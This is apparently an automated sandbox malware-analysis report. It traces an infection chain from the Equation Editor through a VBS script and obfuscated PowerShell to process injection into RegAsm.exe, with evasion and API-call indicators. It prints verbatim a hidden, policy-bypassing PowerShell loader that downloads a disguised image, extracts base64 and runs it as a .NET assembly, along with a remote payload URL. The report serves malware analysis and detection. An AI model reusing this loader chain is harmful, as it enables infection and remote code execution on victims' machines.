                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 484Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2508Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4730Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1596Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9806Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3440Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3728Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3696Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3764Thread sleep count: 4730 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3764Thread sleep count: 1596 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3800Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3804Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3804Thread sleep time: -599735s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3804Thread sleep time: -1200000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3804Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3744Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3856Thread sleep count: 147 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3856Thread sleep time: -441000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3856Thread sleep count: 9806 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3856Thread sleep time: -29418000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_0040928E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,9_2_0041C322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,9_2_0040C388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_004096A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,9_2_00408847
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407877 FindFirstFileW,FindNextFileW,9_2_00407877
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0044E8F9 FindFirstFileExA,9_2_0044E8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,9_2_00419B86
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_0040BD72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,9_2_00407CD2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599735Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_9-48955
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00434A8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CBE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00443355 mov eax, dword ptr fs:[00000030h]9_2_00443355
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004120B2 GetProcessHeap,HeapFree,9_2_004120B2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434BD8 SetUnhandledExceptionFilter,9_2_00434BD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0043503C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00434A8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0043BB71

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3628, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTR
                Bypasses PowerShell execution policy
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
                Injects a PE file into a foreign processes
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Writes to foreign memory regions
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe9_2_00412132
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00419662 mouse_event,9_2_00419662
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS" Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dy? ? ? ? ?m? ? ? ? ?? ? ? ? ?x? ? ? ? ?dc? ? ? ? ?m? ? ? ? ?? ? ? ? ?2? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?v? ? ? ? ?gk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?g4? ? ? ? ?zqb3? ? ? ? ?f8? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?f8? ? ? ? ?mg? ? ? ? ?w? ? ? ? ?di? ? ? ? ?n? ? ? ? ?? ? ? ? ?w? ? ? ? ?dk? ? ? ? ?m? ? ? ? ?? ? ? ? ?1? ? ? ? ?c8? ? ? ? ?bgbl? ? ? ? ?hc? ? ? ? ?xwbp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?lgbq? ? ? ? ?h? ? ? ? ?? ? ? ? ?zw? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?bo? ? ? ? ?gu? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?e8? ? ? ? ?ygbq? ? ? ? ?gu? ? ? ? ?ywb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbo? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?fc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cq? ? ? ? ?dwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?lgbe? ? ? ? ?g8? ? ? ? ?dwbu? ? ? ? ?gw? ? ? ? ?bwbh? ? ? ? ?gq? ? ? ? ?r? ? ? ? ?bh? ? ? ? ?hq? ? ? ? ?yq? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fu? ? ? ? ?cgbs? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?fs? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c4? ? ? ? ?rqbu? ? ? ? ?gm? ? ? ? ?bwbk? ? ? ? ?gk? ? ? ? 